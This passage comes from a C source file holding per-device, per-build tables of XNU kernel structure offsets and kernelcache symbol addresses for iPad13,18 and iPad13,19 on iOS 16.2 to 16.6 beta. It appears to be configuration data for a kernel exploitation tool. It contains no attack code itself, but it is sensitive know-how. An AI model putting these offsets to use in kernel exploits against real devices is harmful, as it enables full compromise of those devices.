0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad 10th gen // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3c5190, .kernelcache__gPhysBase = 0xfffffff0078400c8, .kernelcache__gPhysSize = 0xfffffff0078400c8 + 8, .kernelcache__gVirtBase = 0xfffffff00783e2a8, .kernelcache__perfmon_devices = 0xfffffff00a4003b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef41c4, .kernelcache__ptov_table = 0xfffffff0077f3378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3ff800, .kernelcache__vm_pages = 0xfffffff0077f0090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3ff7f8, .kernelcache__vn_kqfilter = 0xfffffff007f46780, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3cd190, .kernelcache__gPhysBase = 0xfffffff0078401b0, .kernelcache__gPhysSize = 0xfffffff0078401b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783e390, .kernelcache__perfmon_devices = 0xfffffff00a4083b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef40f4, .kernelcache__ptov_table = 0xfffffff0077f33b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a407800, .kernelcache__vm_pages = 0xfffffff0077f00d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4077f8, .kernelcache__vn_kqfilter = 0xfffffff007f466a0, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3cd190, .kernelcache__gPhysBase = 0xfffffff0078401b0, .kernelcache__gPhysSize = 0xfffffff0078401b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783e390, .kernelcache__perfmon_devices = 0xfffffff00a4083b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef40f4, .kernelcache__ptov_table = 0xfffffff0077f33b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a407800, .kernelcache__vm_pages = 0xfffffff0077f00d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4077f8, .kernelcache__vn_kqfilter = 0xfffffff007f466a0, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E246", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d208, .kernelcache__gPhysBase = 0xfffffff00791ffc0, .kernelcache__gPhysSize = 0xfffffff00791ffc0 + 8, .kernelcache__gVirtBase = 0xfffffff00791e198, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c64c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b538, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d208, .kernelcache__gPhysBase = 0xfffffff00791ffc0, .kernelcache__gPhysSize = 0xfffffff00791ffc0 + 8, .kernelcache__gVirtBase = 0xfffffff00791e198, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c64c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b538, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a499288, .kernelcache__gPhysBase = 0xfffffff007920100, .kernelcache__gPhysSize = 0xfffffff007920100 + 8, .kernelcache__gVirtBase = 0xfffffff00791e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4d7520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c84c, .kernelcache__ptov_table = 0xfffffff0078d3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4d6990, .kernelcache__vm_pages = 0xfffffff0078cfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078d2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4d6988, .kernelcache__vn_kqfilter = 0xfffffff007f5b9d0, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPad13,18", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a549ab0, .kernelcache__gPhysBase = 0xfffffff0079382a8, .kernelcache__gPhysSize = 0xfffffff0079382a8 + 8, .kernelcache__gVirtBase = 0xfffffff007936460, .kernelcache__perfmon_devices = 0xfffffff00a589550, .kernelcache__perfmon_dev_open = 0xfffffff007f3508c, .kernelcache__ptov_table = 0xfffffff0078eb9c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a588910, .kernelcache__vm_pages = 0xfffffff0078e8108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a588908, .kernelcache__vn_kqfilter = 0xfffffff007f83be0, }, // iPad 10th gen // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPad13,19", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3c5190, .kernelcache__gPhysBase = 0xfffffff0078400c8, .kernelcache__gPhysSize = 0xfffffff0078400c8 + 8, .kernelcache__gVirtBase = 0xfffffff00783e2a8, .kernelcache__perfmon_devices = 0xfffffff00a4003b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef41c4, .kernelcache__ptov_table = 0xfffffff0077f3378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3ff800, .kernelcache__vm_pages = 0xfffffff0077f0090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077f2328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3ff7f8, .kernelcache__vn_kqfilter = 